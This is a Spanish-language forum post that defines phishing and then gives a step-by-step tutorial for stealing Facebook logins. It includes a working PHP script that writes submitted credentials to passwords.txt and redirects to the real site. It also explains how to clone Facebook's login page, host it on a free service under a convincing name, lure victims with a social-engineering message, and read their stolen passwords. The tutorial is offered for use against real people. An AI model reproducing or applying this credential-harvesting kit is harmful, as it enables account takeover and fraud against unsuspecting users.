¿que es el phishing?
Suplantación de identidad.
El termino Phishing es utilizado para referirse a uno de los métodos mas utilizados por delincuentes cibernéticos para estafar y obtener información confidencial de forma fraudulenta como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria de la victima.
El estafador, conocido como phisher, se vale de técnicas de ingeniería social, haciéndose pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo general un correo electrónico, o algún sistema de mensajería instantánea, redes sociales SMS/MMS, a raíz de un malware o incluso utilizando también llamadas telefónicas. [Enlace externo eliminado para invitados] toda la información de que es el phishing y como protegerse
¿como hackear facebook mediante phishing?
PASO 1: Crear archivo Phishing.php (block de notas )
1. Incluso si usted no tiene ningún conocimiento de archivo PHP simplemente copia el siguiente script y lo guardara como phishing.php
:<?php
header("Location: https://www.facebook.com/login.php");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
PASO 2 : Creación de página index.html :
1. Abra la página de inicio de sesión de Facebook a continuación , haga clic derecho > Ver código fuente de página y pegarlo en el bloc de notas y guardarlo como
index.html
2. Abra el archivo index.html que con un bloc de notas y búsqueda ( pulsando Ctrl + F ) para: acción en él y sustituir la parte resaltada ( como en la siguiente captura de pantalla) con phishing.php
[[
3. Búsqueda ( pulsa Ctrl + F ) para: método en ella y reemplace la parte resaltada (post ) con get
[Enlace externo eliminado para invitados]
4. pon guardar como index.html y hace click donde dice codificación UTF-8
OJO SI LO GUARDAS SIN LA CODIFICACIÓN UTF-8 QUEDARA LA PAGINA CON FALTA DE AUTOGRAFIA Y CON SIGNOS DE PREGUNTA EN TODAS PARTES SI QUE POR ESO GUARDARLO CON CODIFICACIÓN UTF-8
[Enlace externo eliminado para invitados]
PASO 3 : Ahora crea un archivo de texto completamente en blanco con el nombre passwords.txt
Ahora usted tiene todas las siguientes tres archivos con usted:
1. phishing.php
2. index.html
3. passwords.txt
Paso 4 : Ahora tiene que hacer un sitio web
Le recomendé que [Enlace externo eliminado para invitados] porque es completamente gratuito de alojamiento con dominio gratis .
Ir a : [Enlace externo eliminado para invitados] y haga click en donde dice Regístrate y completa lo siguiente como la captura de pantalla
[Enlace externo eliminado para invitados]
2. Ahora vea su cuenta de correo electrónico que usted dio y confirme su cuenta con el enlace de confirmación .
3. subir los archivos (index.html) (passwords.txt) (phishing.php) ya que esten adentro de su cuenta miarroba van donde dice hosting si no lo encuentran entren en [Enlace externo eliminado para invitados] luego van donde dice nuevo espacio dan click saldrá algo así
[Enlace externo eliminado para invitados]
llenan los datos les recomiendo que en Dirección de la página web: pongan algo relacionado con facebook como facebooksoporte o como quieran solo es para hacerlo un poco mas creible
ahora si a subir los archivos (index.html) (passwords.txt) (phishing.php)
van donde dice 1 espacio alado de nuevo espacio dan click y saldrá el nombre que pusieron en Título de la página web bueno le dan en administrar y saldrá algo muy parecido a esto van donde dice webFTP
[Enlace externo eliminado para invitados]
ay dos carpetas hacen click donde dice web abren la carpeta estará sin archivos
[Enlace externo eliminado para invitados]
buno hacen click donde dice subir y marcan el archivo (index.html) ya que se aya subido el index suben el archivo (passwords.txt) y luego el archivo (phishing.php) bueno quedaría algo así
[Enlace externo eliminado para invitados]
AHORA DAN CLICK DONDE DICE INDEX.HTML Y LOS LLEVARA A UNA PAGINA IGUAL A FACEBOOK QUE PARECE LEGITIMA Y LISTO ENVÍAN EL LINK DICIENDO NOSE UN EJEMPLO ME PUEDES AYUDAR CON MI PAGINA DALE ME GUSTA POR FAVOR (ingeniería social)
la pagina falsa
[Enlace externo eliminado para invitados]
AHORA CUANDO LA VICTIMA YA PUSO SU DATOS COMO CORREO ELECTRONICO CONTRASEÑA YA QUE PUSO INICIAR RECIÉN SE VA ALA PAGINA ORINAL DE FACEBOOK
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
¿ahora como reviso el correo y la clave que ingreso la victima?
muy fácil ay dos opciones de revisarlas
1. poniendo despues de el url passwords.txt como esta captura
[Enlace externo eliminado para invitados]
2. abren miarroba van donde dice a su hosting creado van donde dice webFTP abren la carpeta web marcan la casilla donde dice passwords.txt hacen click donde dice accion y hacen click donde dice editar
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
toda duda del contenido enviarme un mensaje a [email protected]